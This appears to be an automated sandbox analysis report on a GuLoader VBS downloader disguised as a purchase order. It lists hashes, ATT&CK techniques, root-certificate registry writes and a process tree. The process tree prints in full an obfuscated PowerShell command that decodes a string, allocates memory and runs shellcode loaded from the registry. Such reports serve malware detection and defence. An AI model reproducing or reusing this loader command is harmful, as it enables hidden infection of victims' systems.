guloader | 49ac5f8e93405000797da63ae1940247ba0d142d901b10709fadbd73f1c9e613

General

Target

PO753285-R962R.vbs
Size

312KB
MD5

e78e16bb9ca9f241fa120eea2fab0835
SHA1

7ed629a2188c522cec23b01ca51724cfef06161e
SHA256

49ac5f8e93405000797da63ae1940247ba0d142d901b10709fadbd73f1c9e613
SHA512

c60007f35d1f0103b91bf77088c04594102fe6467d0b852353a32219e43f7a53c7db02c7d163158089c536c7da5fdf31b8c5fb7367f71f9878eb32815c3ff7a2
SSDEEP

6144:BRwW1rIERcrf7hHMvgNfmkDQYG6uDSqpaxtD+6t5t53GX:BRLrI8cT7hHMvCOkD9GMqpa/6X

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

2 4968 WScript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
2	4968	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

3312 powershell.exe
3312 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3312 powershell.exe

pid	process
3312	powershell.exe
3312	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3312	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 4968 wrote to memory of 3312	4968	WScript.exe	powershell.exe
PID 4968 wrote to memory of 3312	4968	WScript.exe	powershell.exe
PID 4968 wrote to memory of 3312	4968	WScript.exe	powershell.exe
PID 3312 wrote to memory of 32	3312	powershell.exe	csc.exe
PID 3312 wrote to memory of 32	3312	powershell.exe	csc.exe
PID 3312 wrote to memory of 32	3312	powershell.exe	csc.exe
PID 32 wrote to memory of 2396	32	csc.exe	cvtres.exe
PID 32 wrote to memory of 2396	32	csc.exe	cvtres.exe
PID 32 wrote to memory of 2396	32	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO753285-R962R.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Maladministers = """IlluvAprogedAkutadOvern-AarsaTCretiyNutlepSpongeomdan Soelv-BetinTEleveyFilmopHavvaeIndkaDskvhoeAvislfTribuiSnrlinSolskiSalgstAspiriUnsuroGlasenSlive Majen'UnfleuAdonisStenoiDroemnBlodggGuepa BiochSmelleyThrensGipsytkanoneGenuimHydro;ReexauFrygtsCanonitese nHagbagIndia DamebSAnticyAftjesPatrutOverdeViganmFlamb.tgernRTorneuMaglenBelt tHospiiGravemAnlgseGahni.UhensIStangnPliedtKubikeFejlsrBrneloAgurkpStrreSkentleAutonrsynopvKonomiInduscBisaeeBathrsHutch;RrigspLameluSandwbLitiglHedetiCapricItine BaandsDiskotForhnaCitertWebsiiindkocNonlu SupercAudiolTagetaDilatsSlutssFiske PoppaFSimuloQuipprUlverkPermetMisporRredeeWintelNonfusDerrieFylderSubdesTereb1Spire{Brnde[SpottDJesuilDisemlClipsIBayonmArvempRestioDeaccrSknhetBgebr(Kvadr`"""RegreAOverrDOptimVSamtaASmaamPEfterIDinuc3Isthm2cervi.TacklDSkrfnLKonsuLBrine`"""expur)Blist]SvupppStedouPedlebUnderlGuldmiHystecUnord CookisBeneftBukleaAssautGeotaiRollicSynch KorreeTossexpostptPowereArresrsodalnRoet TapetiChordnAnywhtPhono FolkeNfarfeoscriptSvansiPrfikfWettayIndfaBubetvoArchioBrneptHadeaCFoeleoundernforsvfInforiMastogUlselSFarvetAboveaIntrotforsyuUdtrysAfble(AfsloiAabnenIronitGiaco KontaDPresueSoldrvTrneroHulle)Tiger;Brnds[StikkDdaaselExtrolKamerIKablimRonchpRykkeoRidenrHamadtClash(Stage`"""TaglakTranqeRkkehrCalcinProtreBehealTakke3Ponde2Resha`"""Trkba)Princ]Lmwh pSaliguDatelbSuboplUnsatiGbakkcNonde unicasbilletBlidtaFastltLeggiiMacrocFiber BandaeSjaelxRakettCritieCrystrTrsklnFixid RessoidiplonFlodmtAkrob SupreWBuceraforlaiForbrtStemlFAlcazoroeverBreadSmomssiEbenanEibrigtresilFiskeeHankiOyazatbdelibjLeonteForkocMudartHjemvEPlovexSlgts(BagniiRidesnUtakntRevet FellaSFolkeqMastouFavnmeSkibs,PressiNedlgnMargrtWella IndenBNetateAegagnStyrteMacrofOrmeraDiama9Teori5Tingi,kinkliUrethnblodstRosea MetamRBeskiuForsknFremmdBanal)Odels;Erhve[AstigDRednilLungilKejseIDecormLeveapLsninoIndskrDermatBugfi(Smile`"""AntidkNonskeMidderGrossnAngeleIhndelKniks3Nonsa2Recti`"""Aufai)Unsor]TempepRemisuFaldsbExosklLegesiProhicFormu UltrosGiraftTankraAppretShamoiSolitcWhale MoneteLiniexlignitBrasteAnslarSkillnForec MultiiKaklenEssoitspill refulCMellermormoeTrepiaTresttUranietykkaFRumleiUdtmmlBookbeLattiMDividaProtopbimplpCrassiTrensnBlodsgCicer(SlettiVasopnSqueatTersu forgeFBrystoUudryrTillimWiresiHooke,FordoiAkkurnFrilutKdend AmperIStillnteg hcBombiuGennemPotbo,HalteiforcenExacetCypse ForldVRockhoUnderlUnetytIndsnatune mMacke,FrtidiLedsanBatratDetox BudgeGSensiaUnbensBans tTrstp,SubreiSpecinBlodbtIllum FrardOnvnefvAppreeskuerrAutoilSemit,InkviiAndannParadtbtter BedriCBegynoUsurpebutandTipspuLadde)Malte;Trans[CanthDLkkerlJordelPlatyILnkehmBagatpTripeoNonderStribtSkams(forfg`"""LogerkHesitePredarMedlenretsheMedielJetti3Progr2Domin`"""Sangv)Oplan]SknskpLureruNonrebCrawllGaleriDyrekcObser SubsesTychotAfsenaHumantSimoniSmokecAlber ForhaeSerolxUdfyltInvalePkwy rpliotnForsk ProduimotocnamblytNonde FluctLDesigCGamogMBevaraFolkepKommaSDorgstDihybrRessaiBisolnDecengcleid(TungeiJet BnRephotLigeg SubteaTilfrnJunkygBreddlmogigoCrotofSkrek,IsoquiStvrenOpdrttOsmot BradyHLagopeObscudEndot,CommuiPhrennUndertTylos FusioIJustinHeretdHlqn eAmesskForensloads,MakiminecronUdlydtOptat GrnthsCommoyAfskynStopfcdethreUncoupAnerg,Rudd iTsunanPaamitorgan OchleADobbetlisantParod,KrongiUngdonMoteltRetir fraseUEmodilOvertvobfus)Rutin;Conne[EndosDLangulEnrenlBospoIUropfmAutotpDesseoOutsarCocowtDampe(spion`"""UgemawTilsmiJenkinJockemCavilmExtra.DisspdFljtelTorpilHemod`"""Grund)Aceto]AlgorpFootsuDisfabOverllPygobiTreatcChass IntersBugtatErhveaBangetslouciunbewcSalim VagtteGlittxPjatttBelaaeraastrPunktnGunco horogiKollenTresptSkovs ClovemmiscuiUtilldSkilliThermSRefertRukh rFady eFalshaUbrudmDaaneOFieldpMedfoeBrav nPrede(asceniVegetnUrositFluor FortoPUndepalrestrSimas,DiffriDelelnNonsutfusio SikkaSMs UdkhatchaWhunsdMisfeeFlerdtAnalo,UnhidiForynnsupertTelep FourhcUnadmrskrukuQualisDatateBesluhAssis,UdmnsiFevernHabuktPotpi NicarHHeartaTandbsRototpFagpeeForkl,FreesiArbejnidiomtRelan AttraSInkubcEndanaAttralUrogeeDebil,PrintiWaternUnsuptZymas haiduDWhoopiRdsptsVaerdtAnkeleStoma)Chimn;Nikka[ConcoDStyrilunivelUbegaIMidgemSplenpMindsovegetrChilitUnimp(After`"""MoleskHemateSwatcrUndernSigyneOmtaalPanam3Strat2Undsk`"""Aktio)Indes]Fir KpSkattuUnmodbDopinlKorroiMalmvcTireh MiljisOchlotGrundaErobrtVrangiAfrydcenstr BoccieForunxSulphtEgnspeUsurprLithonSkorp DublaIErstanKourotTempoPSkumttHastvrKitch HejseEAppennNecesuMadurmkoereSjacutyHypodsSolentKultuePherimUnderLRepuboFortecEddaeaskelplCarboeAgriosHmostACelti(AfskrupoteniThromnSelentannek regnsvUdeba1sgad ,FonoliTemponReliktBiogr RetrevFulde2Akkil)Foder;Uranb[udflaDAmtsdlQuilllTrigeIDrmmemTrktjpDins oConfirGavottListe(Amphi`"""MuddekrudeveTekstrRebecnRykkeeUdstrlImmig3Affra2Becau`"""Emula)Salth]UntiepHazaruspoofbanlgslOpretiAcantcUnder BetulsMaid tSektiaWrinktUpgroiUdraacElekt CakebeKaktuxHygrotHypodeTln OrcloyenFigur MateliSherinRosvrtAtop StaveVHydroiSttterDecaltVarpeuMonocatertslDecusAObserlIdrt lLigaeoSkvhecCentr(BorsjiUndtanCargotAntip UltravSnbel1Glasf,AfmatiBasionskovbtvacuo PaastvThese2Skivv,UnresiexaninKampgtUncon CabuyvJoblo3Bulks,SangbiKapernSkadetPinde EkspevTyren4Ufora)Unsel;Minor[SpindDFremslCinealPleurImonopmZinitpSmaatoSkjorrAntiktAutof(Overr`"""DisciAFrsteDJohnsVAnciaACountPTredjINoise3bygge2Mocom.PhorbDOverlLQueliLFeber`"""Malac)Kasta]HalvlpunfluuNotchbHalvolFilipiDept cFatbr GdninsHemirtAffalaBugtetOversisymfocJernb StandeStemmxEftertTrakeeAnglirJeaninEkspr SrettiLempenbutyntBlind DecenANonincGyneccYngleeSamvrsoveresBenfeCGulddhCentreSlotscSandvkStrmfAsovienAdjuddSuperASkabsuLykopdUnmetiSkobrtsmaatAUproblGuimpaLavy rIzcatmSkyll(PackwiUddelnsyltetDestr HouseAToilevKontrgSnydeaLystfsGentlsWrang,ForviiDeternManletDrikk AfvnnEDiatofWintetGaull,ScuteiGallonElevatBatli LimitRIneffeDemonaScunnsStandsFilka,PassuiSinusnTohaatBlend DentaMDanceikargocTaknerRefab,FremsiPreinnSheritUddat SeersSIrritibeavedhrsil,EvakuiOdontnCuscotDmone KalliEUnrasgPaabyeEmpurnBiosc,SlurkiSkurknCreoptSphae AllerMLektoaRevapjOveresWittc,LutheiMalhenVensktchalk BoldgOToaktmHeartsThank,EctypiCalmenSpanktDomes veriftAbelshUniveaMarve,SnderiAnnihnFickltSanja topviBDistolMayaioAktiecDiabekTakkehFaint,AfskriTekstnChieftMyoxu SimplTSkovbaEpulopMelan)Wipeo;Raven[PhotoDSnaillPlanelInconIUnreamMaalepLngstofiksprStjrttTrovr(Cypre`"""PostlkKvarteForsirSvndrnindefeBlyanlEfter3Bogka2Drukn`"""Spgel)unans]InitipudkasuKipliboptjelFijiaiDistacVisit CompasBiblitHysteaPolygtCommoiProtecsnepl SkovleCourtxAmphitByggeeRaspirEstonnThund EnthuiIndesngroggtShowm EsselVrasboiPrparrVrvletDetaluFuldtaBindelNoun FDetubrwellseTrepaeMaane(ProkliConfinFremstTaxam middaSNonadyFittacScolooTertipSolst,SikkeiPraksnBeggatTeeth ExplaSOddfeoPrissuStillaPistogFurio,CanasiSpastnDecidtRebsl FortlUUnstankontadCagew)Super;Affin[hovedDSplatlBisexlKikkeISymbomBiotepRecesoDonerrPetaltProcr(Bolst`"""TermiAScreeDCrandVProduAPythiPSeropIRural3Corni2Cosov.cost DoutraLNatioLSamme`"""Kapit)Knorh]MnttepOpereuTiltabInst lPhiloiBonuscRette RedetsSkeletMaalsaAnet tbloodiSlummcAtipt SleeveDokumxDobertPopeseArbejrAscernGainc SubriiAxeronOverntBeane StudeRScrapeMontegsynalEAnslanLambouProppmManneKPatsieUnawkytecto(mastiiNonfrnSjipptEleat MowieOBrostvantikeNiggerVarianPurisiFlume,BronziProdunKompltRescr FortrBLoggiaDresslLaudafAtomsoPhaceuMicro,EuryaiGlyptnEndostTurse StrinrAnpriaundertBinewiVagaboImagi,MessaiFaresnDyarctBetae BackfFCarniiEvapolNamastVidne)Fases;Zogan[safarDvinealDekomlPostmICompuminderpFluidoMiskurAnisbtPlanl(Velkl`"""TongauTillgsspoileSukkerSoapw3Rajah2Overp`"""Yngle)Muter]BrnddpAstiguMikrobAfmaglArtsfiDayakcEdith DevulsSikketPaataaBattltUnviciCymarcPseud JaskeenonelxOctartrifeseRakisrFrugtnKvgbe ValgtiFrugtnCienetAnlgs PassaGUgudeeAccidtPeiraALagersPicoryOpholnSeptecFriseKSammeeSkovfyKmnerSSlyngtScotiaVsenetfermeeBasis(UnsaniGripmnUnopttAcari RligsTNasebuSilkenCharcgOutfi)mecha;Encep[NonvoDFe PilLokallMfindIStandmHelaupTropeoBrandrvedkotHelli(Torch`"""BetrykBicepeShammrOprusnCruroeTidsflAha U3Nonpe2Deerw`"""Unocc)Ordkr]BarkapKrummuOprrsbOstenlStmagiWaysicDemon SpadesApandtRestbaFlsketSnaggidumbfcCowpo SaksieFlowsxSurfitVandieHftekrMarginLavar StiveiSkyndnMasqutFyrre BnderGPendeeHerretForkiHBestaaBaromnBomi dFlotelCoregeproctIAlismnWinedfToaktoUnclurCemetmSubtraUndertVanddiFremlotringnKrb E(ObduciDiastnKameltSprng BoatmWsnebohCompluNetsuzElevaaTvrre,LignoiTanganFavortGaran HomeoGClaywaQuadrlKirke)Sandf;Servi[NedslDNativlArikslSightITappimHexacpImpeaofredlrGallitDownl(Nedsu`"""CrotakInfereSamfurBugtenFrontedriftlBevar3afbud2Grund`"""Slagt)Gazeb]LynfrpBelchuEnterbAkkvilKopjeiKlippcAnane CarresYakoktGnideaMindstFlyveiUndercisall PartneOperaxNonextUhviseOverwrDeanenGalsk vivieiThumbncurrytAntif BrddeGMascheRystetExantOsamlevPrmieeSkovarFingelPregeaSamlipFortrpUnchiebiasddSchooRUnthrebrandsFeticuHomellAbildtDagma(HistoiTypesnEarphtAnret NonpaKDompaoSprutptyls eBuddi,PortiibleacnOunditTeleo AssauULuksudNonrebFinge,BlomkiFunginFllestMenta AdvenSProcevStylemFloormNilaveFldni,BalaniAgternSonovtAbori FlammPpatruiUdblsnLasagiSubavnVeggegPalan)Aktio;Stran[PrimrDSkrivlIndjalFordkIParafmRegrepUdramoDissorBlesktSorte(Kfert`"""StungiFiffimUfoermRecha3Dope 2Prece.SuccidHadsklFraktlCocai`"""Macro)Lande]VortipInexpuRaffibFikselFinaliMisnucDrink GromisTegngtSlgeraFlatttNedariOrdlycHandm InduseExtraxLucastOrddeeinbrerFortinPrest InflaiCollanVelmatKikis DambrIFolkemSkyenmVltenSMilieeHumertmissiCChoctoPeronmlignopMacrooSluddsTelefiYarovtUnderiTraskoFristnskrpnWhmostiBeskinManusdEpitaowillowUnpro(VanskiShurlnSmiditInter PatriTWoolshBrabbeBouilrBeseg,sarceiMennenXeroptbeton UdnytNChehaoDetainTilkatVillo)Carbo;Disko}Derne'Prede;Zygop`$reverFSaloooAfkogrOverskVagtstSysterCorkeeDomfllseldosBlaaheUdbrerSkalpsDdsse3Creat=Spank[UlselFBaciloEpilirRgparkSkinktThinnrDsigeeTorpelFeltusStemmeTvrbjrHydrosOmlas1Mesor]Poste:Discr:CentrVDilutiGuararFriaftMenusuCalamaGraeclLoveaAHemialDosmelSequeoilluscBlayk(Flour0april,svine1Urfje0Mcdon4Overs8Choke5Octoe7Frste6Zenit,Heste1Inves2Konst2Trist8Prere8Bancu,Emulg6Balal4Suppr)Milit;Recon`$AntitBAcrylaTuttasfrerguMattenAniseeLagoprIndtrsSlaae=Penge(SolvuGDisineRaekktFiksp-BonenIFllestbisseestrikmSkrivPJacobrSnneroDisfrpcoppeePasserRosevtUntheyCalli Valer-UnprePBatraaCresotSurprhTeawa Windr'KrampHEnterKTimesCStoicUAssoc:Slalo\TommeWUoveraChivvrpresipScalpaSibentTasjahkaffesAlmis\VivartWitterMajseochrisnAftraePlejesFagli'Worms)Foozl.surmoATherogIsobirFarveePatcheParalaRektibFaarelCsneteLopesnTakseeSekunsStyrksAttrieMaksisClogw;Scyph`$NachoVCalcsaSangblEnergeEkvipdOprigiCreodcGenretPsykooStererBellmiYoma aacquinPnske Repor=Gener Orchi[myricSUnpalyBarresSensitprodueMaisemStrig.FagliCnonscoFagudnSkarnvUdgifeselenrUtilstFelli]Skrue:Parti:EnfanFBetinrTapacoFowlfmpeterBicteraPodnisAskereDefor6Ultim4LavtlSUnpartZee KrRitediMalmhnKlimagbroke(Selvo`$IndusBSyllaaFoot sUdasiuMeditnTrskaeSkiorrMiliosStenk)Chill;Yvere[speanSInvt yundersGenittIfreleAntitmParti.StancRDetesuliggenVaabetTarbeiStetomNormeeSolic.JagtsIRayinnDamartOmsoreAfgrerAfvaloEmbrypunconSOxheaearvefrNonpavSlagtiPsychcRearreThormsRecar.TykneMPolitaAdiporUnfilsFestehnoncoaVldenlLacer]Tidsf:Eilee:ManslCEets oGrundpHonesyUnlea(Opbag`$NonecVcaffraAfstilAcknoeeffasdCholdiTrangccimcutPolysoKviksrDiffeiSkovaaLysinnBlre ,Udtal Infik0aston,Vicin Overt Medic`$verdeFAfgudoSuperrZydllkartiltUnassrStegeeGendrlMismasBrkkeeSpredrAnaessSandp3psych,Ulema Damer`$KrydsVSedesaCampilGuaraeSarcodAnthriGlosscCavictHemiroFrithrGensaiArbejaSwitcnDbend.CaffecRiddeoretsvuefternGrevstsamme)Janet;Metal[SelskFTraktoBindwrsemidkEnuretSyntarAarineImpielPolybsSakseeInexprAcacisTredi1oncog]Vekse:Casey:PostpEBrandntotaluMidtpmUninsSHidfryAfmagsGydertPikebeUnspomSnestLDefinoMarincBlaseaHrdeblResideOutthsPolarATegne(Dokto`$BykvaFsubinoLuminrBuggekvegettBodefrHvirveRosselDenumsLbes eTrivirimpersmestr3Skrdd,Recei Extra0Chowd)Trekv;""";Function Forktrelsers4 { param([String]$Bemaerk2); For($Traumatiserer=5; $Traumatiserer -lt $Bemaerk2.Length-1; $Traumatiserer+=(5+1)){ $Forktrelsers5 = $Bemaerk2.'Substring'($Traumatiserer, 1); $Afstribet = $Afstribet + $Forktrelsers5; } $Afstribet;}$Bemaerk0 = Forktrelsers4 'JateoIMakabECookiXContr ';$Bemaerk1= Forktrelsers4 $Maladministers;&$Bemaerk0 $Bemaerk1;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xbsaw2lr\xbsaw2lr.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:32

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD98.tmp" "c:\Users\Admin\AppData\Local\Temp\xbsaw2lr\CSCBC43A9F7E4CC4BB1BEF6E558C83F5ADB.TMP"
4⤵
PID:2396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBD98.tmp

Filesize
1KB

MD5
e9a0b03cf489de769ccac370bc610f4a

SHA1
81465068ae655e35449c8950fc8716a034168cf4

SHA256
574511bfb771debf95847e78574fc759291597af4c5f54a6198d0e1f06d86f85

SHA512
